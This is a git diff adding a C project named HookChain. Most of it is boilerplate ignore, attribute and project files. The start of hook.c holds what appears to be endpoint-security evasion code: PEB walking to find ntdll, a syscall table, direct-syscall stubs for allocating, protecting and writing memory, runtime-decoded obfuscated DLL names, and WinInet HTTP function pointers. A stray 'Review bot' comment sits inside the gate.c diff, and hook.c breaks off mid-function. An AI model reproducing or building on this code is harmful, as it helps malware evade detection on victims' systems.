diff --git a/.gitattributes b/.gitattributes
new file mode 100644
index 0000000..1ff0c42
--- /dev/null
+++ b/.gitattributes
@@ -0,0 +1,63 @@
+###############################################################################
+# Set default behavior to automatically normalize line endings.
+###############################################################################
+* text=auto
+
+###############################################################################
+# Set default behavior for command prompt diff.
+#
+# This is need for earlier builds of msysgit that does not have it on by
+# default for csharp files.
+# Note: This is only used by command line
+###############################################################################
+#*.cs diff=csharp
+
+###############################################################################
+# Set the merge driver for project and solution files
+#
+# Merging from the command prompt will add diff markers to the files if there
+# are conflicts (Merging from VS is not affected by the settings below, in VS
+# the diff markers are never inserted). Diff markers may cause the following
+# file extensions to fail to load in VS. An alternative would be to treat
+# these files as binary and thus will always conflict and require user
+# intervention with every merge. To do so, just uncomment the entries below
+###############################################################################
+#*.sln merge=binary
+#*.csproj merge=binary
+#*.vbproj merge=binary
+#*.vcxproj merge=binary
+#*.vcproj merge=binary
+#*.dbproj merge=binary
+#*.fsproj merge=binary
+#*.lsproj merge=binary
+#*.wixproj merge=binary
+#*.modelproj merge=binary
+#*.sqlproj merge=binary
+#*.wwaproj merge=binary
+
+###############################################################################
+# behavior for image files
+#
+# image files are treated as binary by default.
+###############################################################################
+#*.jpg binary
+#*.png binary
+#*.gif binary
+
+###############################################################################
+# diff behavior for common document formats
+#
+# Convert binary document formats to text before diffing them. This feature
+# is only available from the command line. Turn it on by uncommenting the
+# entries below.
+###############################################################################
+#*.doc diff=astextplain
+#*.DOC diff=astextplain
+#*.docx diff=astextplain
+#*.DOCX diff=astextplain
+#*.dot diff=astextplain
+#*.DOT diff=astextplain
+#*.pdf diff=astextplain
+#*.PDF diff=astextplain
+#*.rtf diff=astextplain
+#*.RTF diff=astextplain
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..4af530a
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,365 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+##
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+
+# User-specific files
+*.rsuser
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+.DS_Store
+**/.DS_Store
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Mono auto generated files
+mono_crash.*
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+[Ww][Ii][Nn]32/
+[Aa][Rr][Mm]/
+[Aa][Rr][Mm]64/
+bld/
+[Bb]in/
+[Oo]bj/
+[Oo]ut/
+[Ll]og/
+[Ll]ogs/
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUnit
+*.VisualState.xml
+TestResult.xml
+nunit-*.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# Benchmark Results
+BenchmarkDotNet.Artifacts/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# ASP.NET Scaffolding
+ScaffoldingReadMe.txt
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# AxoCover is a Code Coverage Tool
+.axoCover/*
+!.axoCover/settings.json
+
+# Coverlet is a free, cross platform Code Coverage Tool
+coverage*.json
+coverage*.xml
+coverage*.info
+
+# Visual Studio code coverage results
+*.coverage
+*.coveragexml
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+PublishScripts/
+
+# NuGet Packages
+*.nupkg
+# NuGet Symbol Packages
+*.snupkg
+# The packages folder can be ignored because of Package Restore
+**/[Pp]ackages/*
+# except build/, which is used as an MSBuild target.
+!**/[Pp]ackages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/[Pp]ackages/repositories.config
+# NuGet v3's project.json files produces more ignorable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directories and files
+AppPackages/
+BundleArtifacts/
+Package.StoreAssociation.xml
+_pkginfo.txt
+*.appx
+*.appxbundle
+*.appxupload
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+#*.snk
+
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+#bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+ServiceFabricBackup/
+*.rptproj.bak
+
+# SQL Server files
+*.mdf
+*.ldf
+*.ndf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+*.rptproj.rsuser
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+node_modules/
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+*.vbw
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# Paket dependency manager
+.paket/paket.exe
+paket-files/
+
+# FAKE - F# Make
+.fake/
+
+# CodeRush personal settings
+.cr/personal
+
+# Python Tools for Visual Studio (PTVS)
+__pycache__/
+*.pyc
+
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+
+# Tabs Studio
+*.tss
+
+# Telerik's JustMock configuration file
+*.jmconfig
+
+# BizTalk build output
+*.btp.cs
+*.btm.cs
+*.odx.cs
+*.xsd.cs
+
+# OpenCover UI analysis results
+OpenCover/
+
+# Azure Stream Analytics local run output
+ASALocalRun/
+
+# MSBuild Binary and Structured Log
+*.binlog
+
+# NVidia Nsight GPU debugger configuration file
+*.nvuser
+
+# MFractors (Xamarin productivity tool) working folder
+.mfractor/
+
+# Local History for Visual Studio
+.localhistory/
+
+# BeatPulse healthcheck temp database
+healthchecksdb
+
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+MigrationBackup/
+
+# Ionide (cross platform F# VS Code tools) working folder
+.ionide/
+
+# Fody - auto-generated XML schema
+FodyWeavers.xsd
\ No newline at end of file
diff --git a/HookChain/.gitattributes b/HookChain/.gitattributes
new file mode 100644
index 0000000..1ff0c42
--- /dev/null
+++ b/HookChain/.gitattributes
@@ -0,0 +1,63 @@
+###############################################################################
+# Set default behavior to automatically normalize line endings.
+###############################################################################
+* text=auto
+
+###############################################################################
+# Set default behavior for command prompt diff.
+#
+# This is need for earlier builds of msysgit that does not have it on by
+# default for csharp files.
+# Note: This is only used by command line
+###############################################################################
+#*.cs diff=csharp
+
+###############################################################################
+# Set the merge driver for project and solution files
+#
+# Merging from the command prompt will add diff markers to the files if there
+# are conflicts (Merging from VS is not affected by the settings below, in VS
+# the diff markers are never inserted). Diff markers may cause the following
+# file extensions to fail to load in VS. An alternative would be to treat
+# these files as binary and thus will always conflict and require user
+# intervention with every merge. To do so, just uncomment the entries below
+###############################################################################
+#*.sln merge=binary
+#*.csproj merge=binary
+#*.vbproj merge=binary
+#*.vcxproj merge=binary
+#*.vcproj merge=binary
+#*.dbproj merge=binary
+#*.fsproj merge=binary
+#*.lsproj merge=binary
+#*.wixproj merge=binary
+#*.modelproj merge=binary
+#*.sqlproj merge=binary
+#*.wwaproj merge=binary
+
+###############################################################################
+# behavior for image files
+#
+# image files are treated as binary by default.
+###############################################################################
+#*.jpg binary
+#*.png binary
+#*.gif binary
+
+###############################################################################
+# diff behavior for common document formats
+#
+# Convert binary document formats to text before diffing them. This feature
+# is only available from the command line. Turn it on by uncommenting the
+# entries below.
+###############################################################################
+#*.doc diff=astextplain
+#*.DOC diff=astextplain
+#*.docx diff=astextplain
+#*.DOCX diff=astextplain
+#*.dot diff=astextplain
+#*.DOT diff=astextplain
+#*.pdf diff=astextplain
+#*.PDF diff=astextplain
+#*.rtf diff=astextplain
+#*.RTF diff=astextplain
diff --git a/HookChain/.gitignore b/HookChain/.gitignore
new file mode 100644
index 0000000..4af530a
--- /dev/null
+++ b/HookChain/.gitignore
@@ -0,0 +1,365 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+##
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+
+# User-specific files
+*.rsuser
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+.DS_Store
+**/.DS_Store
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Mono auto generated files
+mono_crash.*
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+[Ww][Ii][Nn]32/
+[Aa][Rr][Mm]/
+[Aa][Rr][Mm]64/
+bld/
+[Bb]in/
+[Oo]bj/
+[Oo]ut/
+[Ll]og/
+[Ll]ogs/
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUnit
+*.VisualState.xml
+TestResult.xml
+nunit-*.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# Benchmark Results
+BenchmarkDotNet.Artifacts/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# ASP.NET Scaffolding
+ScaffoldingReadMe.txt
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# AxoCover is a Code Coverage Tool
+.axoCover/*
+!.axoCover/settings.json
+
+# Coverlet is a free, cross platform Code Coverage Tool
+coverage*.json
+coverage*.xml
+coverage*.info
+
+# Visual Studio code coverage results
+*.coverage
+*.coveragexml
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+PublishScripts/
+
+# NuGet Packages
+*.nupkg
+# NuGet Symbol Packages
+*.snupkg
+# The packages folder can be ignored because of Package Restore
+**/[Pp]ackages/*
+# except build/, which is used as an MSBuild target.
+!**/[Pp]ackages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/[Pp]ackages/repositories.config
+# NuGet v3's project.json files produces more ignorable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directories and files
+AppPackages/
+BundleArtifacts/
+Package.StoreAssociation.xml
+_pkginfo.txt
+*.appx
+*.appxbundle
+*.appxupload
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+#*.snk
+
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+#bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+ServiceFabricBackup/
+*.rptproj.bak
+
+# SQL Server files
+*.mdf
+*.ldf
+*.ndf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+*.rptproj.rsuser
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+node_modules/
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+*.vbw
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# Paket dependency manager
+.paket/paket.exe
+paket-files/
+
+# FAKE - F# Make
+.fake/
+
+# CodeRush personal settings
+.cr/personal
+
+# Python Tools for Visual Studio (PTVS)
+__pycache__/
+*.pyc
+
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+
+# Tabs Studio
+*.tss
+
+# Telerik's JustMock configuration file
+*.jmconfig
+
+# BizTalk build output
+*.btp.cs
+*.btm.cs
+*.odx.cs
+*.xsd.cs
+
+# OpenCover UI analysis results
+OpenCover/
+
+# Azure Stream Analytics local run output
+ASALocalRun/
+
+# MSBuild Binary and Structured Log
+*.binlog
+
+# NVidia Nsight GPU debugger configuration file
+*.nvuser
+
+# MFractors (Xamarin productivity tool) working folder
+.mfractor/
+
+# Local History for Visual Studio
+.localhistory/
+
+# BeatPulse healthcheck temp database
+healthchecksdb
+
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+MigrationBackup/
+
+# Ionide (cross platform F# VS Code tools) working folder
+.ionide/
+
+# Fody - auto-generated XML schema
+FodyWeavers.xsd
\ No newline at end of file
diff --git a/HookChain/HookChain/HookChain.vcxproj b/HookChain/HookChain/HookChain.vcxproj
new file mode 100644
index 0000000..4d00bb8
--- /dev/null
+++ b/HookChain/HookChain/HookChain.vcxproj
@@ -0,0 +1,154 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 17.0
+ Win32Proj
+ {b0c08c11-23c4-495f-b40b-14066f12faab}
+ HookChain
+ 10.0.18362.0
+ HookChain_msg
+
+
+
+ Application
+ true
+ v143
+ Unicode
+
+
+ Application
+ false
+ v143
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+ Static
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Level3
+ true
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ Disabled
+ CompileAsC
+ false
+ false
+
+
+ Console
+ true
+ true
+ false
+
+
+
+
+
+
+
+
+
+
+
+
+ Document
+ false
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/HookChain/HookChain/HookChain.vcxproj.filters b/HookChain/HookChain/HookChain.vcxproj.filters
new file mode 100644
index 0000000..afe2b31
--- /dev/null
+++ b/HookChain/HookChain/HookChain.vcxproj.filters
@@ -0,0 +1,41 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+ {0339378c-afc2-4b49-aa64-16cc34be8a8f}
+
+
+
+
+ Header Files
+
+
+ Header Files
+
+
+
+
+ Source Files
+
+
+ Source Files
+
+
+
+
+ ASM Files
+
+
+
\ No newline at end of file
diff --git a/HookChain/HookChain/gate.c b/HookChain/HookChain/gate.c
new file mode 100644
index 0000000..4ee96c7
--- /dev/null
+++ b/HookChain/HookChain/gate.c
@@ -0,0 +1,4 @@
+#pragma once
+
+#include "gate.h"
+#include
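Review bot: `#pragma once` on the first line of gate.c is a header include-guard and does nothing in a translation unit (it is also non-standard), so it should be dropped here; the same line opens hook.c and can go there too. The second `#include` on the last line of the hunk carries no header name as shown, which would not compile if that is the file's real content — it may be a rendering artefact where an angle-bracketed name was lost, but the dependency should be spelled out explicitly in the file so the build does not rely on it being pulled in through gate.h. gate.h itself is added as an empty file in this commit, so as written gate.c currently declares nothing.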
diff --git a/HookChain/HookChain/gate.h b/HookChain/HookChain/gate.h
new file mode 100644
index 0000000..e69de29
diff --git a/HookChain/HookChain/hook.c b/HookChain/HookChain/hook.c
new file mode 100644
index 0000000..a0d6c30
--- /dev/null
+++ b/HookChain/HookChain/hook.c
@@ -0,0 +1,1130 @@
+#pragma once
+
+#include "hook.h"
+
+#include
+#include
+
+static SYSCALL_LIST SyscallList;
+static SYSCALL_LIST HookList;
+static MODULE_LIST ModList;
+static FARPROC ntdllBase;
+static FARPROC kernel32Base;
+static FARPROC kernelbaseBase;
+
+extern BOOLEAN SetTableAddr(PVOID pSyscallTable);
+extern BOOLEAN SetIdx(DWORD functionIndex, DWORD listIndex);
+extern BOOLEAN GetData(PDWORD* dwSSN, PVOID* pSyscallRet);
+extern VOID SetDebug(BOOLEAN enabled);
+extern VOID SetAddr(PVOID* pAddr);
+extern VOID ExecAddr(_In_ HANDLE hProcess, _In_ LPCSTR imageName, _In_ BOOLEAN force);
+extern VOID SetFunctions(PVOID* pInternetOpenA, PVOID* pInternetConnectA, PVOID* pHttpOpenRequestA, PVOID* pInternetSetOptionA, PVOID* pHttpSendRequestA, PVOID* pInternetReadFile, PVOID* pNtAllocateVirtualMemory);
+
+
+extern NtAllocateVirtualMemoryStub();
+extern NtOpenProcessStub();
+extern NtProtectVirtualMemoryStub();
+extern NtReadVirtualMemoryStub();
+extern NtWriteVirtualMemoryStub();
+extern NtQueryVirtualMemoryStub();
+
+extern RtlCompareStringStub();
+extern RtlEqualStringStub();
+
+static PTEB RtlGetThreadEnvironmentBlock(VOID);
+
+EXTERN_C void PrintCall(unsigned long idx, unsigned long caller, unsigned long stack_addr)
+{
+ /*printf(" ==> Hook reached: Entry[%d] SSN: 0x%02X, RET: 0x%p, RSP: 0x%p, Fnc Addr: 0x%p \n",
+ idx,
+ SyscallList.Entries[idx].dwSsn,
+ caller,
+ stack_addr,
+ SyscallList.Entries[idx].pAddress);*/
+}
+
+BOOL InitApi(VOID)
+{
+
+ if (!FillSyscallTable())
+ {
+#ifdef DEBUG
+ printf("[!] Failed to fill Syscall List");
+#endif
+ return FALSE;
+ }
+
+ FillStatic();
+
+ PVOID lpNameAddr = RtlAllocateHeapStub(RtlProcessHeap(), HEAP_ZERO_MEMORY, 200);
+
+ LPCSTR names[12] = {
+ (char[]) { 0x32,0x2d,0x33,0x2b,0x6c,0x2d,0x65,0x25,0x24,0x24,0x6e,0x26,0x2a,0x72,0x28,0x2e,0x65,0x40,0x21,0x6b,0x00 }, //kernel32
+ (char[]) { 0x65,0x73,0x2e,0x61,0x62,0x23,0x24,0x6c,0x65,0x28,0x2a,0x6e,0x5e,0x72,0x25,0x24,0x65,0x40,0x21,0x6b,0x00 }, //kernelbase
+ (char[]) {0x32,0x33,0x72,0x24,0x23,0x65,0x29,0x2d,0x2d,0x73,0x40,0x21,0x75,0x24,0x23,0x40,0x00 }, //user32
+
+ (char[]) { 0x68,0x23,0x6e,0x2d,0x65,0xcb,0x86,0xcb,0x86,0x61,0x24,0x73,0x40,0x72,0x21,0x00 }, //rsaenh
+ (char[]) { 0x73,0x65,0x76,0x40,0x21,0x69,0x74,0x40,0x69,0x6d,0x26,0x69,0x72,0xcb,0x86,0x25,0x24,0x50,0x29,0x29,0x74,0x2d,0x70,0x79,0x23,0x72,0x63,0x3b,0x2e,0x40,0x21,0x62,0x00 }, //bcryptPrimitives
+ (char[]) { 0x70,0x74,0x2a,0x28,0x74,0x28,0x26,0x68,0xcb,0x86,0x25,0x6e,0x24,0x23,0x69,0x40,0x21,0x77,0x00 }, //winhttp
+ (char[]) { 0x32,0x33,0x25,0x24,0x5f,0x25,0x24,0x32,0x73,0x24,0x24,0x23,0x21,0x77,0x00 }, //WS2_32
+ (char[]) { 0x74,0x65,0x29,0x23,0x23,0x23,0x23,0x23,0x23,0x40,0x6e,0x69,0xcb,0x86,0x25,0x24,0x6e,0x2b,0x2d,0x69,0x26,0xcb,0x86,0x77,0x00 }, //wininet
+ (char[]) { 0x65,0x73,0x23,0x40,0x61,0x24,0x62,0x28,0x2a,0x26,0x74,0x70,0x79,0xcb,0x86,0x25,0x72,0x2a,0x28,0x29,0x63,0x00 }, //CRYPTBASE
+ (char[]) { 0x73,0x6c,0x21,0x69,0x21,0x74,0x21,0x75,0x21,0x74,0x21,0x65,0x21,0x6e,0x00 }, //netutils
+ (char[]) { 0x70,0x73,0x74,0x70,0x26,0x79,0x26,0xcb,0x86,0x72,0x25,0x24,0x23,0x63,0x00 }, //CRYPTSP
+ (char[]) { 0x65,0x72,0x40,0x6f,0x29,0x40,0x21,0x63,0x67,0x62,0xcb,0x86,0xcb,0x86,0x25,0x24,0x64,0x00 }, //dbgcore
+ };
+
+ for (WORD ib = 0; ib < 12; ib++)
+ {
+ LPCSTR lName = (LPCSTR)lpNameAddr;
+ memset(lpNameAddr, 0, 200);
+ WORD i2 = 0;
+ WORD s2 = 0;
+ for (short i = 0; i < 200; i++)
+ {
+ char c = (char)*(((PBYTE)names[ib]) + i);
+ if (c == 0x00) {
+ s2 = i - 1;
+ break;
+ }
+ }
+ for (signed short i = s2; i >= 0; i--)
+ {
+ char c = (char)*(((PBYTE)names[ib]) + i);
+ if ((c >= 0x30 && c <= 0x39) || (c >= 0x41 && c <= 0x5A) || (c >= 0x61 && c <= 0x7a) || c == 0x5f) {
+ ((char)*((char*)((PBYTE)lpNameAddr + i2++))) = (char)*(((PBYTE)names[ib]) + i);
+ }
+ }
+ ExecAddr(Local(), lName, TRUE);
+
+ //UnhookAll((HANDLE)-1, lName, FALSE);
+ }
+
+
+
+ return TRUE;
+}
+
+PVOID CurNtdll(VOID)
+{
+ PTEB pCurrentTeb;
+ PPEB pCurrentPeb;
+
+ PLDR_DATA_TABLE_ENTRY pLdrDataEntry;
+ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+
+ PIMAGE_DOS_HEADER pImageDosHeader;
+ PIMAGE_NT_HEADERS pImageNtHeaders;
+
+ PVOID pBase = NULL;
+ PVOID npBase;
+
+ pCurrentPeb = NtCurrentPeb();
+
+ if (!pCurrentPeb || pCurrentPeb->OSMajorVersion != 0x0a)
+ goto cfinal;
+
+ pImageExportDirectory = NULL;
+ pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
+
+ pBase = pLdrDataEntry->DllBase;
+
+ pImageDosHeader = (PIMAGE_DOS_HEADER)pBase;
+
+ if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
+ goto cfinal;
+
+ pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pBase + pImageDosHeader->e_lfanew);
+
+ if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE)
+ goto cfinal;
+
+cfinal:
+ if (pBase == NULL) {
+ npBase = GetClearNtdll();
+ if (npBase != NULL) {
+ pBase = npBase;
+ }
+ }
+
+ return pBase;
+}
+
+static BOOL FillSyscallTable(VOID)
+{
+ //Return if it already filled
+ if (SyscallList.Count > 0) return TRUE;
+
+ if (!GetBaseAddresses()) return FALSE;
+
+ PPEB pCurrentPeb;
+
+ PLDR_DATA_TABLE_ENTRY pLdrDataEntry;
+ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
+
+ PIMAGE_DOS_HEADER pImageDosHeader;
+ PIMAGE_NT_HEADERS pImageNtHeaders;
+
+ PVOID va;
+ PVOID pBase;
+ PVOID pRealBase = CurNtdll();
+
+ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory2 = NULL;
+ PIMAGE_NT_HEADERS pImageNtHeaders2 = NULL;
+ PDWORD pdwFunctions2 = NULL;
+ PDWORD pdwNames2 = NULL;
+ PWORD pwNameOrdinals2 = NULL;
+
+ pImageNtHeaders2 = ((PIMAGE_NT_HEADERS)((PBYTE)pRealBase + ((PIMAGE_DOS_HEADER)pRealBase)->e_lfanew));
+ if (pImageNtHeaders2->Signature == IMAGE_NT_SIGNATURE && pImageNtHeaders2->OptionalHeader.DataDirectory[0].Size > 0) {
+ pImageExportDirectory2 = (PBYTE)pRealBase + pImageNtHeaders2->OptionalHeader.DataDirectory[0].VirtualAddress;
